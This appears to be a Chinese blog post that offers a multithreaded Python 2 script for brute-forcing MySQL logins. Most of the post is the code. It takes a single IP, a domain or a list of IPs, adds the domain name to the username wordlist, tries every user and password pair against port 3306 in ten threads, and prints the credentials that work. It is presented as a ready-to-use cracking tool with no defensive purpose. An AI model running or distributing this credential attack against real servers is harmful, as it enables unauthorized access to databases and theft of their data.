升级自:https://www.waitalone.cn/python-mysql-mult.html
在原基础上增加如下功能:

  1. 支持ip批量爆破,只需同目录存在ip.txt文件;

  2. 如果输入的目标是域名,将域名添加到用户列表,增加爆破成功率;

  3. 去掉了端口和数据库的输入,默认了端口3306和数据库mysql。

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
    42
    43
    44
    45
    46
    47
    48
    49
    50
    51
    52
    53
    54
    55
    56
    57
    58
    59
    60
    61
    62
    63
    64
    65
    66
    67
    68
    69
    70
    71
    72
    73
    74
    75
    76
    77
    78
    79
    80
    81
    82
    83
    84
    85
    86
    87
    88
    89
    90
    91
    92
    93
    94
    #!/usr/bin/env python  
    # -*- coding: utf-8 -*-
    import os, sys, re, socket, time
    from functools import partial
    from multiprocessing.dummy import Pool as ThreadPool

    try:
    import MySQLdb
    except ImportError:
    print '\n[!] MySQLdb模块导入错误,请到下面网址下载:'
    print '[!] http://www.codegood.com/archives/129'
    exit()

    def usage():
    print '+' + '-' * 50 + '+'
    print '\t Python MySQL批量爆破工具多线程版'
    print '\t\t Time:2014-11-12'
    print '+' + '-' * 50 + '+'
    if len(sys.argv) != 4:
    print "用法: " + os.path.basename(sys.argv[0]) + " 待破解的ip/domain或ip列表 用户名列表 密码列表"
    print "实例: " + os.path.basename(sys.argv[0]) + " www.alin.cn或ip.txt user.txt pass.txt"
    sys.exit()

    def mysql_brute(user, password):
    "mysql数据库破解函数"
    db = None
    try:
    # print "user:", user, "password:", password
    db = MySQLdb.connect(host=host, user=user, passwd=password, db="mysql", port=3306)
    # print '[+] 破解成功:', user, password
    result.append('ip:'+ host + '\t用户名:' + user + "\t密码:" + password)
    print '[true] ip:'+ host + '\t用户名:' + user + "\t密码:" + password+'\n'
    except KeyboardInterrupt:
    print '大爷,按您的吩咐,已成功退出程序!'
    exit()
    except MySQLdb.Error, msg:
    print '[false] ' + host+' '+user+':'+password+'\n'
    finally:
    if db:
    db.close()

    if __name__ == '__main__':
    usage()
    start_time = time.time()
    if re.match(r'\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}', sys.argv[1]):
    with open("tmp.txt","w") as f:
    f.write(sys.argv[1])
    ips = "tmp.txt"
    elif re.match(r'\w+\.txt',sys.argv[1]):
    ips = sys.argv[1]
    else:
    with open("tmp.txt","w") as f:
    f.write(socket.gethostbyname(sys.argv[1]))
    ips = "tmp.txt"
    isExist = 0
    isExist1 = 0
    with open(sys.argv[2],'r') as tmp:
    for line in tmp.readlines():
    if sys.argv[1] in line:
    isExist = 1
    if isExist1 == 1:
    break
    if re.sub(r'\.\w+$','',sys.argv[1]) in line:
    isExist1 = 1
    if isExist == 1:
    break
    with open(sys.argv[2],"a") as f:
    if isExist == 0:
    f.write("\n"+sys.argv[1])
    if isExist1 == 0:
    f.write("\n"+re.sub(r'\.\w+$','',sys.argv[1]))
    iplist = [k.rstrip() for k in open(ips)]
    userlist = [i.rstrip() for i in open(sys.argv[2])]
    passlist = [j.rstrip() for j in open(sys.argv[3])]
    print '\n[+] 目 标:%s \n' % sys.argv[1]
    print '[+] 用户名:%d 条\n' % len(userlist)
    print '[+] 密 码:%d 条\n' % len(passlist)
    print '[!] 密码破解中,请稍候……\n'
    result = []

    for host in iplist:
    for user in userlist:
    partial_user = partial(mysql_brute, user)
    pool = ThreadPool(10)
    pool.map(partial_user, passlist)
    pool.close()
    pool.join()
    if len(result) != 0:
    print '[+] 恭喜大爷,MySQL密码破解成功!\n'
    for x in {}.fromkeys(result).keys():
    print x + '\n'
    else:
    print '[-] 杯具了大爷,MySQL密码破解失败!\n'
    print '[+] 破解完成,用时: %d 秒' % (time.time() - start_time)